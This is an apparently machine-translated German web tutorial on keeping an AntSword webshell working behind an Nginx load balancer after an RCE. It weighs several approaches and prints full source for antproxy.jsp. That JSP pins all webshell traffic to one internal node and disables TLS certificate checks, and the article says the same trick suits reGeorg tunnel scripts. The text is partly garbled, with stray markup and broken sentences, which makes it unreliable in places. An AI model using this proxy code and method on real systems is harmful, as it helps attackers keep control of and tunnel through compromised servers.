So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich

WBOY
Freigeben: 2023-05-16 08:16:13
nach vorne
1530 Leute haben es durchsucht

Szenariobeschreibung

Angenommen, in einer realen Produktionsumgebung gibt es eine RCE-Schwachstelle, die es uns ermöglicht, WebShell zu erhalten

Umgebungsinstallation

Vor dem Abrufen des anfälligen Images auf GetHub müssen zunächst Nginx und Tomcat auf Centos installiert werden Konfigurieren Sie im Voraus die relevanten Konfigurationsdateien von Nginx und Tomcat und ziehen Sie das Image mit Docker herunter, um die Schwachstelle zu reproduzieren.

1. Richten Sie zuerst die Docker-Umgebung ein

So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich

2. Testen Sie, ob auf Tomcat zugegriffen werden kann. Wie Sie auf dem Bild oben sehen können, ist der Back-End-Tomcat zugänglich Nginx-Antwort im Docker. Lastausgleich für den Agenten lbsnode1:

So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich

lbsnode2:

So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich5. Verbinden Sie die ant.jsp-Datei über China Ant Sword

Da sich beide Knoten ant.jsp am selben Ort befinden, gibt es beim Verbinden keine Ausnahme

Probleme im Reproduktionsprozess

So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich

Problem 1: Da es sich bei dem von Nginx verwendeten Reverse-Proxy um eine Abfragemethode handelt, muss die hochgeladene Datei an denselben Ort auf den beiden Backend-Servern hochgeladen werden

So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich

Weil wir Reverse-Proxy-Last sind Der Ausgleich beinhaltet das Hochladen von Dateien. Ein Back-End-Server verfügt über die von uns hochgeladene Datei, der andere Server verfügt jedoch nicht über die von uns hochgeladene Datei. Das Ergebnis ist, dass, sobald auf einem Server keine Datei vorhanden ist, der Server an der Reihe ist , wird ein 404-Fehler gemeldet, der sich auf die Verwendung auswirkt. Aus diesem Grund erscheint es eine Zeit lang normal und es treten eine Zeit lang Fehler auf.

So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich

Lösung:

Wir müssen eine WebShell mit demselben Inhalt am selben Ort auf jedem Knoten hochladen, damit auf unseren Backend-Server zugegriffen werden kann, unabhängig davon, welcher Server abgefragt wird. Um hochgeladene Dateien auf jedem Back-End-Server zu erreichen, müssen Sie sie wie verrückt hochladen.

Frage 2: Wenn wir den Befehl ausführen, können wir nicht wissen, an welche Maschine die nächste Anfrage zur Ausführung übergeben wird.

Wenn wir hostname -i ausführen, um die IP der aktuellen Ausführungsmaschine anzuzeigen, werden wir kann sehen, dass die IP-Adresse abgedriftet ist

So implementieren Sie den Webshell-Upload unter Nginx-LastausgleichProblem 3: Wenn wir einige größere Tools hochladen müssen, werden die Tools unbrauchbar

Wenn wir eine größere Datei hochladen, verwendet AntSword beim Hochladen von Dateien die Aufteilung Die Slice-Upload-Methode teilt eine Datei in mehrere HTTP-Anfragen auf und sendet sie an das Ziel, wodurch sich ein Teil der Datei auf Server A und der andere Teil der Datei auf Server B befindet, wodurch größere Tools oder Dateien nicht geöffnet werden können oder Verwenden von

Frage 4: Da der Zielhost nicht auf das externe Netzwerk zugreifen kann, können Sie, wenn Sie weitergehen möchten, nur einen HTTP-Tunnel wie reGeorg/HTTPAbs verwenden. In diesem Szenario schlagen jedoch alle diese Tunnelskripte fehl.

Lösung

Option 1: Einen der Back-End-Server herunterfahren So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich

Das Herunterfahren eines der Back-End-Server kann zwar die oben genannten vier Probleme lösen, aber diese Lösung ist wirklich „seinen Geburtstag hängen lassen“ „Ich habe das Leben satt“, es wird sich auf das Geschäft auswirken und Katastrophen verursachen, also gehen Sie einfach vorbei, ohne darüber nachzudenken

Umfassende Bewertung: Versuchen Sie es unter solchen Umständen nicht! ! !

Option 2: Bestimmen Sie, ob das Programm ausgeführt werden soll, bevor Sie es ausführen

Da es unmöglich ist, vorherzusagen, welcher Computer es das nächste Mal ausführen wird, können wir zunächst feststellen, ob dies erforderlich ist, bevor unsere Shell die Nutzlast ausführt hingerichtet.

Erstellen Sie zum ersten Mal ein Skript demo.sh. Dieses Skript dient zum Abrufen der Adresse eines unserer Back-End-Server. Das Programm wird nur ausgeführt, wenn es mit der Adresse dieses Servers übereinstimmt Auf einem anderen Server wird das Programm nicht ausgeführt.

Laden Sie die Skriptdatei demo.sh über China Ant Sword auf die beiden Back-End-Server hoch. Da es sich um einen Lastausgleich handelt, müssen Sie zum Hochladen wie verrückt klicken

So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich

So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich

Auf diese Weise können wir tatsächlich sicherstellen, dass sich der ausgeführte Befehl auf der gewünschten Maschine befindet, aber so Es gibt keinen Sinn für Schönheit beim Ausführen von Befehlen. Darüber hinaus wurden Probleme wie das Hochladen großer Dateien und das HTTP-Tunneling nicht gelöst.

Umfassende Bewertung: Diese Lösung ist kaum nutzbar, nur für den Einsatz bei der Ausführung von Befehlen geeignet und nicht elegant genug.

Option 3: HTTP-Verkehr in der Webebene weiterleiten (wichtiger Punkt)

Ja, wir verwenden AntSword? Das ist es Es ist nicht möglich, direkt auf den 8080-Port der LBSNode1-Intranet-IP (172.23.0.2) zuzugreifen, aber jemand kann darauf zugreifen. Zusätzlich zu Nginx kann die LBSNode2-Maschine auch auf den 8080-Port der Node1-Maschine zugreifen.

Erinnern Sie sich noch an das Plug-in „PHP Bypass Disable Function“? Nachdem wir dieses Plug-in geladen haben, haben wir lokal einen http-Server gestartet und dann das Traffic-Weiterleitungsskript auf HTTP-Ebene verwendet. Schauen wir uns dieses Bild Schritt für Schritt an. Unser Zweck ist: Alle Datenpakete können an die Maschine „LBSNode 1“ gesendet werden

Der erste Schritt ist Schritt 1, wir fordern /antproxy.jsp und diese Anfrage an wird an nginx gesendet# 🎜🎜#So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleichnginx Nach dem Empfang des Datenpakets gibt es zwei Situationen:

Schauen wir uns zunächst die schwarze Linie an. In Schritt 2 wird die Anfrage weitergeleitet die Zielmaschine und die Anfrage wird an die Node1-Maschine gestellt, dann organisiert /antproxy.jsp in Schritt 3 die Anfrage neu und übergibt sie an /ant.jsp auf der Node1-Maschine, die erfolgreich ausgeführt wird. Wenn Sie sich noch einmal die rote Linie ansehen, wird in Schritt 2 die Anforderung an die Node2-Maschine weitergeleitet. In Schritt 3 organisiert dann /antproxy.jsp auf der Node2-Maschine die Anforderung neu und übergibt sie an / Ameise von Node1.jsp, erfolgreich ausgeführt.

1. Erstellen Sie das Skript antproxy.jsp

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="javax.net.ssl.*" %>
<%@ page import="java.io.ByteArrayOutputStream" %>
<%@ page import="java.io.DataInputStream" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.OutputStream" %>
<%@ page import="java.net.HttpURLConnection" %>
<%@ page import="java.net.URL" %>
<%@ page import="java.security.KeyManagementException" %>
<%@ page import="java.security.NoSuchAlgorithmException" %>
<%@ page import="java.security.cert.CertificateException" %>
<%@ page import="java.security.cert.X509Certificate" %>
<%!
  public static void ignoreSsl() throws Exception {
        HostnameVerifier hv = new HostnameVerifier() {
            public boolean verify(String urlHostName, SSLSession session) {
                return true;
            }
        };
        trustAllHttpsCertificates();
        HttpsURLConnection.setDefaultHostnameVerifier(hv);
    }
    private static void trustAllHttpsCertificates() throws Exception {
        TrustManager[] trustAllCerts = new TrustManager[] { new X509TrustManager() {
            public X509Certificate[] getAcceptedIssuers() {
                return null;
            }
            @Override
            public void checkClientTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
                // Not implemented
            }
            @Override
            public void checkServerTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
                // Not implemented
            }
        } };
        try {
            SSLContext sc = SSLContext.getInstance("TLS");
            sc.init(null, trustAllCerts, new java.security.SecureRandom());
            HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
        } catch (KeyManagementException e) {
            e.printStackTrace();
        } catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
        }
    }
%>
<%
        String target = "http://172.24.0.2:8080/ant.jsp";
        URL url = new URL(target);
        if ("https".equalsIgnoreCase(url.getProtocol())) {
            ignoreSsl();
        }
        HttpURLConnection conn = (HttpURLConnection)url.openConnection();
        StringBuilder sb = new StringBuilder();
        conn.setRequestMethod(request.getMethod());
        conn.setConnectTimeout(30000);
        conn.setDoOutput(true);
        conn.setDoInput(true);
        conn.setInstanceFollowRedirects(false);
        conn.connect();
        ByteArrayOutputStream baos=new ByteArrayOutputStream();
        OutputStream out2 = conn.getOutputStream();
        DataInputStream in=new DataInputStream(request.getInputStream());
        byte[] buf = new byte[1024];
        int len = 0;
        while ((len = in.read(buf)) != -1) {
            baos.write(buf, 0, len);
        }
        baos.flush();
        baos.writeTo(out2);
        baos.close();
        InputStream inputStream = conn.getInputStream();
        OutputStream out3=response.getOutputStream();
        int len2 = 0;
        while ((len2 = inputStream.read(buf)) != -1) {
            out3.write(buf, 0, len2);
        }
        out3.flush();
        out3.close();
%>
Nach dem Login kopieren

2. Ändern Sie die Weiterleitungsadresse und leiten Sie sie an die Intranet-IP weiter des Zielknotens.

Hinweis: Nicht nur WebShell, sondern auch die Zugriffsadresse von Skripten wie reGeorg kann geändert werden

Wir werden gezielt ant.jsp von LBSNode1

Hinweis:

a) #🎜 nicht verwenden 🎜#Upload-Funktion

, die Upload-Funktion lädt in Teilen hoch, wodurch sie auf verschiedene Knoten verteilt werden. So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich

b) Um sicherzustellen, dass jeder Knoten den gleichen Pfad zu antproxy.jsp hat, habe ich ihn viele Male gespeichert, um sicherzustellen, dass jeder Knoten das Skript hochgeladen hat

So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich3 Adresse von antproxy.jsp, andere Konfigurationen bleiben unverändert 🎜 #

So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich

Sie können sehen, dass die IP behoben wurde, was bedeutet, dass die Anfrage an die Maschine LBSNode1 behoben wurde. Zu diesem Zeitpunkt unterscheidet sich die Verwendung von mehrteiligem Upload und HTTP-Proxy nicht von der Standalone-Situation. Wenn die Berechtigungen hoch sind, kann die Weiterleitung auch direkt über die Portebene erfolgen unterscheidet sich nicht vom Off-Site-Dienst von Plan A So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich

2 In Bezug auf den Datenverkehr betrifft es nur den Zugriff auf WebShell-Anfragen, andere normale Geschäftsanfragen sind nicht betroffen.

3. Weitere Tools anpassen

Nachteile: So implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich

Diese Lösung erfordert „Zielknoten“ und „Andere Knoten“. sind innerhalb des Intranets miteinander verbunden. Wenn sie nicht miteinander verbunden sind, geraten sie in Schwierigkeiten.

Das obige ist der detaillierte Inhalt vonSo implementieren Sie den Webshell-Upload unter Nginx-Lastausgleich. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Verwandte Etiketten:
Quelle:yisu.com
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage
Über uns Haftungsausschluss Sitemap
Chinesische PHP-Website:Online-PHP-Schulung für das Gemeinwohl,Helfen Sie PHP-Lernenden, sich schnell weiterzuentwickeln!